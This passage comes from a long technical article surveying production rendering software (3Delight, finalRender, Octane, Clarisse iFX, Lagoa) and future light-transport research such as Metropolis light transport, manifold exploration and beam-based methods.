    The notion of moving to new tools that are more physically accurate but also simpler from an artist point of view is a common desire in the industry. Image Engine does a lot of creature work, which often involves a lot of passes, baked textures and complex pipelines, so a high quality realistic but simpler process to lighting is very attractive. The less work in data management the more iterations and actual lighting the team can do. The team is in the middle of re-writing their shader library right now and re-examining some of those complex shader networks that have gone up in production over time. “For a lot of work and especially for background elements – hard surface props etc – we can move to using ready made shaders that have a lot of the physically plausible shading built in,” says Toogood, “and having that base will hopefully make their behaviors more predictable for the artists. But whether that will be run through ray tracing or not is something we will have to look at. We need to be flexible and quite responsive, we have to be a bit more clever than most in spending our computational budget, we are not a huge mega studio.”

    A final shot from the parcade collapse in Fast & Furious 6 (VFX by Image Engine).

    A final shot from the parcade collapse in Fast & Furious 6 (VFX by Image Engine).

    As Image Engine does a lot of character animation work it uses the SSS point cloud solution in 3Delight. They have found it very efficient to render – the only downside is the need to pre-bake the point cloud, which as with all such approaches makes render time tweaks hard as one needs to go back and re-bake the point cloud. “In terms of quality we are quite happy and our artists are very capable in manipulating the tools 3Delight offers to get good results,” says Toogood.

    Image Engine recently has tried a hybrid HDR / IBLs approach of capturing image probes on set, then projecting that onto geometry representing the scene and then using 3Delight’s point based indirect global illumination to project the light then back onto the character, “so if a character is close to a wall they get bounce from the wall, but to get the artistic control our supervisors require we supplement that with normal spot lights to tune the shot,” Toogood explains.

    Image Engine works closely with the 3Delight team and they enjoy very good support and have a close working relationship. Unlike the web site of 3Delight which at the time of writing has not been updated for years, Image Engine gets the latest builds if need be and a very direct response from DNA Research. DNA seems to have a closely held group of users, and their twitter account is a graveyard. DNA will be at SIGGRAPH this year, and will soon be releasing new versions of its plug-ins and 3Delight Studio Pro.

    The Thing. VFX by Image Engine.

    The Thing. VFX by Image Engine.

    3Delight Studio Pro’s current features include ray tracing, global illumination (including photon mapping, final gathering and high dynamic range lighting and rendering), realistic motion blur, depth of field, complete geometry support (including highly efficient rendering of hair and fur), programmable shaders and antialiased shadow maps. It is available for Windows, Linux and Mac OS X.

    The latest version of 3Delight (including for both the Softimage and Maya plug-in) has done a lot of work on ray tracing, with a full path tracing option with MIS and new materials. The next big release should see a lot of these new ray tracing tools available to all other users. 3Delight CTO Aghiles Kheffache told fxguide in regards to the new version they will hopefully be showing at Siggraph that “we have a new multiple importance sampling framework that is easy to use. We have a new environment sampling algorithm that produces less noise than the competition. As an example, we don’t ask our users to blur environment maps in order to get nice sampling. The algorithm also extracts very nice shadows from environment maps. Our plug-ins now have the ability to do ‘IPR.’ ” he said adding that in his opinion “We claim that we have the fastest path tracer around. Especially when multiple bounces are involved.”

    Other 3Delight clients include Soho VFX , Rising Sun PicturesToonBox Entertainment , NHK, and Polygon Pictures (in Japan).


    2.11 finalRender – Cebas (GPU + CPU)

    finalRender was the first renderer to practically apply true global illumination rendering to the large­scale vfx movie production with the film 2012. The movie’s bigger scenes used finalRender’s advanced global illumination algorithms to render the vast photoreal disasters. The product is about to completely change with a new approach, and virtually all new code.

    An older render pre-4 from Makoto (Pasadena).

    An older render pre-4 from Makoto (Pasadena).

    There is a new version of FinalRender 4GPU that will be launched at SIGGRAPH and as the name implies it will have GPU support, and be a normal upgrade to 3.5 users. “We have been working for a long time now,” says Edwin Braun, CEO at Cebas Visual Technology Inc, “the next step is really a new product, and with the changes in CUDA (5.5) – it will be a CUDA product – we have had to do so many new changes – it is really a new renderer – there is not much left from 3.5 – other than the name!”

    It is part of a wave of new GPU products, but significantly different as it is also CPU. There will now be “no difference between a GPU rendering and a CPU rendering and that is a hard thing to do,” says Braun, “we are getting really close to this goal we have set for ourselves.”

    The newest version is finalRender 4 GPU which is a­ hardware accelerated (GPU) rendering approach­ with a rather unique balance between GPU and CPU balancing. Unlike many other GPU­-only renderers, finalRender 4 GPU “will always be faster” with newer hardware even when upgrading the workstation alone and still keeping the GPU card. It will use all available rendering cores and not only one type of processor.

    Living room interior rendered in finalRender by Doni Sudarmawan.

    Living room interior rendered in finalRender by Doni Sudarmawan.

    In contrast to other renderers, Cebas uses a hardware acceleration approach that will not favour CPU over GPU or vice versa. In fact, cebas’ trueHybrid technology will leverage the full potential of existing CPU cores as well as, simultaneously, using all existing GPU cores and memory. Maintaining full accessibility to features and functionality of the core raytracing system, trueHybridTM will not sacrifice quality for speed. Unlimited Render Elements (layers), Volumetric Shaders, complex Blend Materials and layered OpenEXR image file export along with hundreds of 3rd Party plug­ins; are a few of the features made possible by finalRender 4 GPU that were otherwise unattainable with a GPU­only rendering system.

    finalRender 4 GPU provides some shading and rendering flexibility to GPU rendering. Offering an advanced new material shading core provides finalRender with the advantage of representing nearly every material effect in the form of a highly optimized native GPU shader. It supports the car shader the skin shader, and many other shaders from 3DMax. “If you have a Mental Ray scene and you use the Mental Ray architectural materials from Mental Ray, you can just render it with our GPU renderer,” says Braun.

    Rendering Core and Integration finalRender 4 GPU is a fully integrated 3ds Max renderer with the key benefit of being compatible with existing 3ds Max workflows that usually include support of third party plug­ins. The following three rendering methods are all available with finalRender 4 GPU:

    • GPU Only Rendering Mode (full path rendering like Octane, or V-RayRT)
    • CPU Only Rendering Mode (like the old 3.5 used to run)
    • CPU + GPU (trueHybrid) Rendering Mode

    The last mode “uses the GPU for your CPU rendering.” What does that mean? If you render with Fume FX, this is a CPU plugin, but in hybrid mode it will pass off some internal calculations to the GPU, in effect it is a GPU turbo charger on the CPU, even if the plugin should only be a CPU option. In tests this hybrid mode has shown 2x up to 5x speed improvements over just CPU alone. This hybrid mode is different from where a CPU may help a GPU. As the Cebas model works the other way, all the CPU plugins will be able to get GPU acceleration. “We can use all 3DStudio Max plugins as we were able to use them in our sw renderer, and the user will have no problem running 3D Max plugins and use their GPU if it is available,” explains Braun. This will work well for farm rendering when the farm machines may have no GPU cards.

    finalRender 4 GPU is aiming for a really high goal of providing ­a continuous GPU/CPU rendering workflow for 3ds Max users. trueHybrid is a novel approach. It was developed to allow co-­operative hardware rendering by leveraging different types of processors at the same time in one workstation.

    finalRender’s memory optimization algorithms enable new Physically Based Microfacet rendering models for rendering various Blurry/Rough surface effects.


    src="http://www.youtube.com/embed/zVvfHCPK6yI?rel=0" height="480" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Above: watch a Cebas Making of Reel.


    Global Illumination Methods

    finalRender offers the benefit of multiple Global Illumination engines for artists to choose from. The newest GI rendering method offers a unbiased, physically accurate path tracing method; with fast GPU based Global Illumination.

    Other options or methods include:

    • Irradiance Caching
    • Unbiased Rendering
    • Light Cache Rendering

    Core Render Qualities (Realtime and Non­Realtime):

    • Newly developed: Content Aware Sampling (CAS)
    • Physically Based Wavelength / Spectral Light Transport
    • Biased & Unbiased Rendering incl. Direct Lighting / Ambient Occlusion support
    • Full physically based IES light support
    • Physically Based material shading model
    • Highly optimized Geometry Instancing for GPU and CPU

    One of the issues in GPU renders is noise or grain. Although Braun can’t discuss, he hints at a new sampling method that will smooth out such renders and produce a more even and smoother results. To do this he will only hint that they are borrowing from other technologies, hopefully at SIGGRAPH one can find out more about his sampling techniques which do not involve any MIS or importance sampling, he claims.

    Maik (Germany)

    Maik (Germany)

    It is worth noting Cebas also produces Thinking Particles, one of the industry’s key tools for fire, procedural particles and fx animation work. Unfortunately 3ds Max does not allow Thinking Particles to work more closely with finalRender, except by a backdoor. The interface is very old in 3ds Max, but it does mean ThinkingParticles can only do some of the things it does with finalRender – as Autodesk does not allow other products to work together due to the architecture the plugins must normally follow.


    Although Max is the main user group, finalRender is also supported in Maya used at vendors such as Walt Disney Studios, but the Maya code is different, and the new GPU/CPU version 4 will come later in Maya. But there is more flexibility so that version may end up with more features than the Max version. The C4D version is now fairly much discontinued.


    2.12 Octane – OTOY

    Octane is one of three new renderers that we have included in the round up. Each is approaching rendering from a new point of view and each has the promise of being impactful in their own right. Ocatne is a powerful GPU render solution that works using both local and cloud based GPUs.

    Below is a Sony spot animated in 3DS Max and fully rendered on Octane.

    src="http://www.youtube.com/embed/4Qxc_RdJ0Yw" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    fxguide has written about the product when it was launched over a year ago, and was heavily featured at the last Nvidia GPU conference. At that conference it was announced that it would be used by Josh Trank, director of The Fantastic Four, for his in house vfx team. Trank appeared on stage during the keynote speech of Nvidia chief executive Jen-Hsun Huang at the GPU Technology conference in San José. Trank touted how his special effects team will be able to tap cloud-rendering technology from OTOY to create the movie at a much lower cost.

    rteg32

    Octane Render from Lightwave

    As we pointed out at when it came out of Beta, Octane Render is a real-time 3D unbiased rendering application that was started by the New Zealand company Refractive Software. OTOY is now developing the program. It is the first commercially available unbiased renderer to work exclusively on the GPU, and runs exclusively on Nvidia’s CUDA technology. OTOY sells Octane as a stand alone renderer as well as a plugin to popular 3D applications such as Max and Maya. The company has strong links to cloud computing and graphics research. OTOY also owns LightStage, LLC in Burbank which did the facial scanning for The Avengers, among other films, and Paul Debevec is their “chief scientific consultant”. They also have a special relationship with Autodesk, who are an investor, and its tools can be integrated as a plugin for almost all the major 3D art tools on the market today.

    As we said then – “Clearly these guys know what they are doing.”

    The base Octane is still very young, but it has such strong partners in Nvidia and Autodesk alone that it demands attention. But the primary aspect of Octane is its promise to bridge the divide with high end production rendering on GPUs.

    rays

    God rays using Octane with transmissive fog.

    The company also has Brigade which is not yet a shipping product, but aims to deliver GPU ray tracing at game rendering speed. Brigade is a different code base from Octane and the two products are sharing algorithms and innovations moving forward but Brigade is not yet a shipping product. It is however one of leading realtime path tracing games speed rendering products and tests have shown exceptional rendering speed, but at the cost of classic ray tracing noise, that while fine in real time would naturally need to be rendered longer in a production pipeline.

    The whole area of real time ray tracing is about to have another major boost from SIGGRAPH 2013 Realtime Live! event. Once again this year at SIGGRAPH there is a special session showcasing the latest research and in particular games development for realtime rendering.

    Real-Time Live! is perhaps the world’s premier showcase for the latest trends and techniques for pushing the boundaries of interactive rendering. As part of the Computer Animation Festival, an international jury selects submissions from a diverse array of industries to create a fast-paced, 90-minute show of cutting-edge, aesthetically stimulating real-time work. Each live presentation lasts less than 10 minutes, and is presented by the artists and engineers who produced the work. Last year was remarkable for its range of session which included realtime SSS and facial lighting. While it features game engine rendering and art pieces it also very clearly highlights the massive advances in general realtime rendering that are outside this article.


    2.13 Clarisse iFX – Isotropix

    Clarisse iFX is included as one of our three new renderers as it seeks to not fit into a pipeline in a traditional sense. The team lead by founder Sam Assadian wants to merge the product into a pipeline not as an end renderer but starting further back up the pipeline. While solving the render equation quickly is important, it is changing the workflow itself that interests him.

    cityride

    Internal Clarisse demo image (using 75 millions, unique, non-instanced polygons assets, multiplied into 8 billions in Clarisse).

    Clarisse iFX is a new style of high-end 2D/3D animation software. Isotropix is a privately owned France company and has been working on Clarisse iFX now for several years. It has been designed to simplify the workflow of professional CG artists to let them work directly on final images while alleviating the complexity of 3D creation and rendering out as many separate layers and passes. Clarisse iFX is a fusion of a compositing software, a 3D rendering engine and an animation package. Its workflow has been designed from scratch to be ‘image-centric’ so that artists can work constantly while visualizing their final image with full effects on. It wants artists to see the final as much and as constantly as possible.

    At its core, Clarisse iFX has a renderer that is primed and ready to start final renderings within milliseconds of your finger touching something requiring a re-render. It provides a lot more, but this central mantra means that the program feels remarkably fast, insanely faster than it should given that the program is rendering on CPUs and not GPUs.

    Screenshot from Cube Creative's assets from the Kaeloo french TV show, featuring characters rendered with 3D DOF and motion blur...

    Screenshot of Cube Creative’s assets from the Kaeloo french TV show, featuring characters rendered with 3D DOF and motion blur.

    The renderer is different from some listed here in that it is very tied to the front end, but unlike native renderers of animation and modelling packages, Clarisse iFX can’t model. It is designed to import and do some animation, although not character animation.

    Since launching a year ago it has been developing new versions of the software but also working extremely closely with several key players to integrate Clarisse into other OEM products. At SIGGRAPH 2013 it will launch the new v 1.5 with major improvements, but one senses the real action will be in these OEM deals.

    The interest from other companies comes from the lighting fast render times and the data management that focuses not just on fast rendering but changing the relationship between the renderer and the rest of the modeling and animation software. Company founder Sam Assadian explains this conceptually by drawing a picture of the current industry workflow as having “dinosaur, 20 year old code passing along this tiny wire to modern rendering engine – that just does not work.”

    f

    Final shot from Kaeloo.

    What this means in practical terms, according to Assadian, is that when production shots are ready to be handled over to rendering, just loading the files can take, say, 45 mins to open and then even longer to see the first renders appearing. The pipeline may then render efficiently but this lack of integration and legacy code from generalist old software means the artist has no sense of immediate rendering on large scenes.

    For Clarisse iFX he claims the same production shots in their pipeline would open almost straight away and then start rendering almost immediately – “we cut the wire”. His approach is to therefore tackle not so much just fast rendering but integrate the renderer further up the pipeline so the traditional divides are gone but so too are the vast load times and poor interactivity.

    The actual renderer is a single path tracing solution but after the new V1.5 to be launched at SIGGRAPH they may be introducing irradiance caching. This might seem like an odd move, but the speed of irradiance caching is just too compelling for Assadian to ignore. He feels for some jobs especially stills frames of vast complexity many lighting TDs just want the fastest solution and he is keen to provide whatever it takes to render vast scenes quickly. Actually irradiance caching had been mentioned a year ago when we wrote of the launch of the product, and at that time it was thought to be in beta. As a company they do not do a normal release cycle with major versioning. One gathers that at this early stage custom builds and close integration with their small but important user base does not require or respond to a major/minor release normal schedule. While the company has a range of these key OEM customers, there are few customers using the product in day to day production. French Ellipsanimé (also known as Le Studio Ellipse, or Ellipse Programme) is one exception, who use the software for episodic television production.

    Cube Creative's assets from the Kaeloo french TV show, featuring characters rendered with 3D DOF and motion blur...

    Clarisse screenshot.

    The system is still extremely young, it lacks some features such as caustics and deep color/deep compositing but its multi-treaded rendering approach is fast. The company is keen to embace open source, it is especially keen to embace the new Alembic 1.5 as the company finds the current Alembic file format not suited enough to their multi-threaded approach to not be slowing down the iFX system. The current Alembic is supported but Assadian expects big improvements with the new release 1.5, and he has seen 20x times improvements.

    Similarly they are exploring OpenVDB for post 1.5 and seem certain to adopt it for volumetic work. The shader and material definitions are not currently supporting OSL but Assadian described Open Shader Language as “very sexy” and again something they are very keen to explore later this year.

    The company has attracted a lot of early attention for its outrageously fast rendering pipeline (load, interact render). Already it has been working with companies such as ILM and Double Negative. The next 6 months will seem to be critical, if some of these third party companies integrate the product then it could really shake up the industry, if not then its new approach may fail to gain traction and it may need to rethink its new ‘string cutting’ approach and work more like a traditional renderer. But this second option is clearly not of much interest to the team and founder Sam Assadian in particular. The product is worth checking out at SIGGRAPH 2013 if you are attending, they will have a booth.


    2.14 Lagoa

    The last of the new renderers is Lagoa. But unlike the others, Lagoa is not GPU based but it is cloud computing only.

    Rendered in Lagoa.

    Rendered in Lagoa.

    It uses a variety of approaches based on the materials which the company calls Multi-optics. For example, there is a specific approach for hair – optimized for hair, and a different approach for sub-surface scattering, which is a progress non-point based solution – which is again optimized for SSS.

    SSS test rendered for fxguide by Thiago Costa

    SSS test done for fxguide by T. Costa

    It is a web-based renderer. For almost all other products aiming to be a web tool this would mean it is anything but a production renderer. Most other products fall somewhere between a toy and a light weight educational tool. What makes Lagoa stand out is that the actual renderer is technically cutting edge and has real R&D innovation feeding very high quality results.

    The company aims to produce production quality rendering in not only render farm free pipeline but to a local render free desktop machie. With modern internet connections Lagoa aims to be taken very seriously in the high end render market and in so doing change the way people structure companies.

    The Lagoa SSS is brute force (fully ray traced) and includes both single and multiple scattering. “Consequently, the method does not require any precomputation and works for anything ranging from thin volumetric slabs to an army of volumes with highly detailed surface structure. “The only assumptions we make so far is a specific BRDF at the interface: glossy diffuse (“Rough Volumetric”) or pefectly smooth (“Smooth Volumetric”). Moreover, light sources inside a volume is not supported. We also take advantage the path space analysis discussed below (which means that, in the end, we are not fully unbiased),” explains co-founder Arno Zinke.

    The ray tracer is uni-driectional but the company does not like working inside labels such as ‘biased or unbiased’. “Generally, I think the biased vs. unbiased battle is over – consistency is the key,” says Zinke. “We are currently exploring the use of other methods (including fully bidirectional path tracing and a novel progressive consistent method) but the current implementation is uni-directional. On top there is a path space analysis to reduce ‘fireflies’. The method goes beyond standard approaches, like clamping or BRDF smoothing and is less aggressive (more selective) when dealing with hard-to-sample paths.”

    HairClose

    Lagoa Hair Render

    There is extensive use of importance sampling, on materials and light sources and IBL. “We use (multiple) importance (re)sampling for lights (also in spectral domain, when having for example spectrally varying scattering coefficients in case of SSS), image reconstruction filter, phase functions and all other materials,” adds Zinke.

    The system is expanding with more advanced shaders for plastics and other materials, as part of a realease of an update at SIGGRAPH. Included in this will be a new editing texture pipeline and light projectors are also being added.

    One of the great additional services the company offers is to have the exact materials (a 5×5 patch) actually scanned and a real BRDF is then used in the renderer. “Besides classical BSDF and volumes we also support the direct rendering of particle scattering functions, BCSDFs (Bidirectional Curve Scattering Distribution Functions) and BTFs (Bidirectional Texture Functions),” says Zinke.

    The scanning service means “we have a BRDF per pixel,” says Thiago Costa, co-founder. This concept seemed odd – why is it not a BSDF of the material? We asked Arno Zinke to explain: “So when talking about a BRDF per pixel Thiago was referring to BTF, which can be seen as a ‘texture of BRDFs’. A BTF can bemeasured (the standard case) and simulated. Contrary to conventional spatially varying BRDFs a BTF may also include parallax, local shadowing and local SSS effects.”

    NeonThe company’s online presentation may be deceptive, this is not a toy renderer. While the product is streamlined for ease of use it is also able to produce very complex imagery. “As for polycount, we have tested scenes up to a few hundred million (non-instanced) polygons without any problems so far,” says Zinke. “This said our scene layout has been optimized for interactivity/dynamic scene updates, not memory efficiency. We have no magic bullet for sampling complicated light paths.”

    The aim is to provide very complex tools as part of a radical rethink about the very nature of third party renderers, which includes a very different pricing model.

    The company is still young, right now it does not support many open source initiatives, so it does not support deep data, OSL, Alembic, OpenVDB or Cortex but it is currently trying to support OpenSubDiv from Pixar. Interestingly while the company does not support OpenVDB its SSS could allow that in the future if the product moved in that direction. According to Zinke “I’m following Ken Musseth’s research since many years and find OpenVDB very interesting. However, since our focus is on design, supporting volumetric effects like smoke or fog is not having highest priority. As our current SSS implementation is essentially based on volume rendering an extension would be relatively straightforward though.”

    CarpaintsThe company has its own compressed geometry format, which some clients use if they want to compress data before uploading to the cloud/farm/Lagoa environment. It normally compresses data by a factor of 10, depending on the geometry. Everything that gets loaded into Lagoa is converted into this format anyway so for large projects it makes sense to compress before upload. Whatever the format, Solid-works format or any of 20 different file formats that the product supports can be converted before or after upload, but everything that is rendered is in this internal format. “We use a proprietary format for compression of meshes and similar data that uses several high and low-level techniques for drastically reducing memory footprint. All incoming meshes get transcoded into this internal format,” says Zinke.

    The company is also working with other companies to allow them to OEM the Lagoa renderer into a third party application or mobile platform.


    3. Future Directions

    3.1 Metropolis and Manifold
    3.2 A Whole New Approach

    3.1 Metropolis and Manifold

    3.1.1 Metropolis Light Transport

    The central performance bottleneck in path tracing is the complex geometrical calculation of casting a ray. Importance sampling as mentioned above allows less rays through the scene while still converging correctly to outgoing luminance on the surface point. Metropolis light transport (MLT) is another approach (included in Eric Veach’s Ph.D in 1996). In their 1997 Siggraph paper, Veach and Leonidas J. Guibas, described an application of a variant of the Monte Carlo method called the Metropolis-Hastings algorithm.

    Wikipedia has a great definition: The procedure constructs paths from the eye to a light source using bidirectional path tracing, then constructs slight modifications to the path. Some careful statistical calculation (the Metropolis algorithm) is used to compute the appropriate distribution of brightness over the image. This procedure has the advantage, relative to bidirectional path tracing, that once a path has been found from light to eye, the algorithm can then explore nearby paths; thus difficult-to-find light paths can be explored more thoroughly with the same number of simulated photons. In short, the algorithm generates a path and stores the path’s ‘nodes’ in a list. It can then modify the path by adding extra nodes and creating a new light path. While creating this new path, the algorithm decides how many new ‘nodes’ to add and whether or not these new nodes will actually create a new path.

    mlt_comparison

    Arion 2 comparison

    The result of MLT can be an even lower-noise image with fewer samples. This algorithm was created in order to get faster convergence in scenes in which the light must pass through odd corridors or small holes in order to reach the part of the scene that the camera is viewing.The classic example is bright light outside a door – which is coming through a small slot of keyhole. In path tracing this would be hard to solve efficiently, but the bi-directional MLT system of nodally mapping the rays would solve this well.

    It has also shown promise in correctly rendering pathological situations that defeat other renderers such as rendering accurate caustics. Instead of generating random paths, new sampling paths are created as slight mutations of existing ones. In this sense, the algorithm “remembers” the successful paths from light sources to the camera.

    MLT is an interesting topic, we polled almost all the companies mentioned in this story on MLT, the reactions ranged from great but too complex/slow to some senior researches who wanted to implement it, to a rare few like Maxwell who already had a partial implement (hybrid) solution. It is by no means seen as the natural direction to go in by all, but one gets the impression if a workable solution could be found, everyone would at least consider exploring it.

    One company that does support MLT is RandomControl’s Arion 2.

    Arion is a hybrid-accelerated and physically-based production render engine. It takes a parallel GPU+CPU approach. Arion uses all the GPUs – and – all the CPUs in the system simultaneously. Additionally, Arion can use all the GPUs and all the CPUs in all the other computers in the network forming a cluster for massive distribution of animation frames.

    Arion 2 can handle most of the rendering effects which are considered standard these days such as displacements, instancing, motion blur, and more. And beyond the current feature list of Arion, it is aMetropolis Light Transport renderer that can run on the GPU.

    This is not a MLT lookalike or “simili-MLT amputated from its glory to run on a GPU, it’s the true, fully-featured Metropolis algorithm”, claims the company.

    mlt

    Although MLT can be used on any kind of render, it has a great use in optical and lighting simulations. The issue however remains render time per frame. While very accurate, the render above was completed in a few hours on 2 Geforces GTX 580. Note the blue beam that is seen in the total internal reflection of the most left prism for example, is a very hard case for most renderers.

    As mentioned above there are very few Metropolis ray tracing solutions. Arion 2 is one, Maxwell is a hybrid, but why are there not more?

    We asked Marcus Fajardo, founder of Arnold, who had already told us that Veach’s original PhD is so pivotal he re-reads it every couple of years. So why isnt Arnold using MLT? Fajardo points out that the theory was based on work done in the 1950s and 60s. “The reason why it is so difficult to implement in a renderer is that the theory itself is really complicated and it also changes the aspect of the noise you get in images. It works best if the renderer already has a bi-directional path tracing algorithm. In the case of Arnold it is a uni-directional path tracer.”

    Arnold fires rays from camera into the scene not both from the camera and from the lights. “Bi-directional path tracing is really tricky to get right and to make it work well in a production environment, for example programmable shaders don’t work well with MLT.” Shaders in MLT need to preserve the Principle of Equivalence, the shader has to look at it from one direction or the other, from the light or the camera.

    Maxwell has some MLT but it does not support large programmable production shaders, and so Fajardo feels it will be some time before production renderers could even possibly go this way. Most production shaders do not respect the Principle of Equivalence.

    The team at Lagao have explored MLT. “We considered using MLT. I agree that, in its pure form, the unavoidable impact on rendering speed and the bad stratification of samples etc. are serious shortcomings. However, for certain light paths Metropolis sampling (or similar) is the only way to go. As said we are actively working on several methods for improving speed and quality. For us the perfect method has to be practical: interactive/progressive, must scale, has to allow for dynamic scene updates and has to deliver consistent results,” explained co-founder of Lagoa Arno Zinke.

    3.1.2. Manifold Exploration

    Beyond MLT is an even more accurate model, and one that requires no special geometry. It is Manifold Exploration Path Tracing (MEPT) and it could be a major advance in super accurate rendering. “Veach’s work (referring to the 1997 thesis) was the last major contribution to path tracing until last year and the Manifold Exploration,” explained Juan Cañada, the Head of Maxwell Render Technology.

    It is a long-standing problem in unbiased Monte Carlo methods for rendering that certain difficult types of light transport paths, particularly those involving viewing and illumination along paths containing specular or glossy surfaces, cause unusably slow convergence such as rough glass, some meta or plastic. In their 2012 SIGGRAPH paper called the Manifold Exploration, Wenzel Jakob and Steve Marschner from Cornell University proposed a new way of handling specular paths in rendering. It is based on the idea that sets of paths contributing to the image naturally form ‘manifolds’ in path space, which can be explored locally by a simple equation-solving iteration. The resulting rendering algorithms handle specular, near-specular, glossy, and diffuse surface interactions as well as isotropic or highly anisotropic volume scattering interactions, all using the same fundamental algorithm. They showed their implementation on a range of challenging scenes and used only geometric information that is already generally available in ray tracing renderers.

    Certain classes of light paths have traditionally been a source of difficulty in conducting Monte Carlo simulations of light transport. A well-known example is specular-diffuse-specular paths, such as a tabletop seen through a drinking glass sitting on it, a bottle containing shampoo or other translucent liquid, or a shop window viewed and illuminated from outside. Even in scenes where these paths do not cause dramatic lighting effects, their presence can lead to unusably slow convergence in renderers that attempt to account for all transport paths. (SIGGRAPH 2012)

    To understand its approach it is good to summarize this article and the advances it has hopefully highlighted:

    Simulating light transport has been a major effort in computer graphics for over 25 years, beginning with the introduction of Monte Carlo methods for ray tracing (Cook et al. Pixar 1984), followed by Kajiya’s formulation of global illumination in terms of the Rendering Equation (Kajiya 1986), established the field of Monte Carlo global illumination as stated above.

    Unbiased sampling methods, in which each pixel in the image is a random variable with an expected value exactly equal to the solution of the Rendering Equation, started with Kajiya’s original path tracing method and continued with bidirectional path tracing , in which light transport paths can be constructed partly from the light and partly from the eye, and the seminal Metropolis Light Transport (Veach 1997) algorithm. This is a paper so important people still regularly return to it and refer to it today. “He provided a very robust mathematical framework that explained the algorithms (Bi-Directional path tracing and MLT) and explained them very well, but it was theoretical – when you implement your own path tracers you quickly find the evil is indeed in the detail!” comments Cañada.

    Various two-pass methods use a particle-tracing pass that sends energy out from light sources in the form of “photons” that are traced through the scene and stored in a spatial data structure. The second pass then
    renders the image using ray tracing, making use of the stored particles to estimate illumination by density estimation. This two pass approach is great on noise, but it is a pre-processing pass, and there is a move away from point based solutions, but this is still a valid option and used widely.

    Photon mapping and other two-pass methods are characterized by storing an approximate representation of some part of the illumination in the scene, which requires assumptions about the smoothness of illumination distributions. “On one hand, this enables rendering of some modes of transport that are difficult for unbiased methods, since the exact paths by which light travels do not need to be found; separate paths from the eye and light that end at nearby points suffice under assumptions of smoothness. However, this smoothness assumption inherently leads to smoothing errors in images: the results are biased, in the Monte Carlo sense.” (Jakob, SIGGRAPH 2012 )

    MEPTGlossy to glossy transports or rendering, without a sufficiently diffuse surface on which to store photons, are challenging to handle with photon maps, since large numbers of photons must be collected to adequately sample position-direction space. Some photon mapping variants avoid this by treating glossy materials as specular, but this means that the the resulting method increasingly resembles path tracing as the number of rough surfaces in the input scene grows.

    Manifold exploration is a technique for integrating the contributions of sets of specular or near-specular illumination paths to the rendered image of a scene. The general approach applies to surfaces
    and volumes and to ideal and non-ideal (glossy) specular surfaces.

    As you can see in the example above the results are even more accurate and have less noise that MLT. The subtle caustic refractions of pings is captured in the MEPT and lost in the MLT.

    3.2 A whole new approach

    Wojciech Jarosz is a Research Scientist at Disney Research Zürich heading the rendering group, and an adjunct lecturer at ETH Zürich. The Perils of Evolutionary Rendering Research: Beyond the Point Sample, the keynote by Jarosz at EGSR 2013, argued that the way “we approach many difficult problems in rendering today is fundamentally flawed.” Jarosz put forward the case that “we typically start with an existing, proven solution to a problem (e.g., global illumination on surfaces), and try to extend the solution to handle more complex scenarios (e.g., participating media rendering).”

    render teapot

    Image from a paper by Derek Nowrouzezahrai, Jared Johnson, Andrew Selle, Dylan Lacewell, Michael Kaschalk, Wojciech Jarosz. (see full credit in footnote below)

    While he feels that this “evolutionary approach is often very intuitive,” it can lead to algorithms that are significantly limited by their evolutionary legacy. To make major progress, we may have to rethink (and perhaps even reverse) this evolutionary approach.” He claimed that “a revolutionary strategy, one that starts with the more difficult, more general, and higher-dimensional problem – though initially more daunting, can lead to significantly better solutions. These case studies all reveal that moving beyond the ubiquitous point sample may be necessary for major progress.”

    A good example of this are the point based solutions discussed in this article. Jarosz points out that by taking the original idea of the point samples as a basis for research, there is a progression of improvement but always based on points. While there is a rival approach in the full ray traced approach, recently someone stopped and wondered, why points? Why not beams? Since then there has been a series of complete rethinks on many of the point methods such as volumetric illumination, SSS and others starting from a whole new place of assuming beams not points as the ‘point cloud’, in effect replacing that concept with ‘beam clouds’.

    Jarosz’s central point is not to just promote beam approaches but rather he just uses this as an example of coming at a problem from an entirely new way. In his EGSR talk last month he offered several examples from motion blur rendering to SSS on how a completely new revolution in approach is often advantageous over iterative evolution. In other words to get to somewhere new don’t start where we are now, start from a new jumping off point. Certainly the real world examples benefited from this ‘new approach’ thinking and we will have a more in depth fxguide article on his talk published here soon.

    Jarosz does note, however, that he think researchers should rely on the evolutionary approach, but should have revolutions every once in a while to re-examine if “we are doing things the right way.” But, he says, it’s incredibly hard to simply make a revolutionary step without relying on the hard evolutionary steps taken by others.

    One person who heard Wojciech Jarosz’s keynote talk first hand at EGSR was Marcos Fajardo from Solid Angle. “It was a really inspired talk, his talk was amazing, what he is trying to say is we can get stuck in seeing things from a certain way and maybe we should sometimes try and take a broader view of things, and then we can see more generalization of techniques. His main point is very valid, but his examples are quite specific to the work he has does at Disney,” referring to his beam based vs point based approaches.

    Point / Photon vs Beam approaches an example of a different approach.

    Photon points vs Photon beams – an example of a different approach, and not just a refinement to the current approach.

    Fajardo also pointed out that he could not (yet) see any ways that Solid Angle could immediately rethink any of their approaches but he commented that, “I like the way he’s thinking – he is forward looking.” Jarosz says the methods he discussed in his talk have been incorporated into Pixar’s PRMan and used by WDAS in the production of feature films. “Specifically, the photon beams method I discussed was added to PRMan 17 last year, and the new SSS method is now in PRMan 18. So, though the talk tries to be forward-looking, we are also definitely concerned with the immediate applicability of our work to improve production rendering.”

    Finally, Jarosz adds that he thinks Fajardo’s paper from 2012 with Christopher Kulla “is one of my favorite papers on volume rendering in recent memory. It really shows clearly how to make several challenging aspects of production volume media rendering more practical. Though it was not pitched/presented as such, I do think their paper also incorporates some aspects of this “revolutionary” way of thinking and eliminating the traditional view on point sampling in media.”

    Footnote: Lighthouse image from A Comprehensive Theory of Volumetric Radiance Estimation Using Photon Points and Beams, Wojciech Jarosz, Derek Nowrouzezahrai, Iman Sadeghi, Henrik Wann Jensen.

    The teapot in a Cornell box image above. Is from the following publication:
    A Programmable System for Artistic Volumetric Lighting. ACM Transactions on Graphics  Derek Nowrouzezahrai, Jared Johnson, Andrew Selle, Dylan Lacewell, Michael Kaschalk, Wojciech Jarosz.(Proceedings of ACM SIGGRAPH 2011) August 2011.


    Cover image rendered in Maxwell Render. Image courtesy of Hervé Steff- Meindbender.

    Special thanks to Ian Failes.


    Thanks so much for reading our article. 

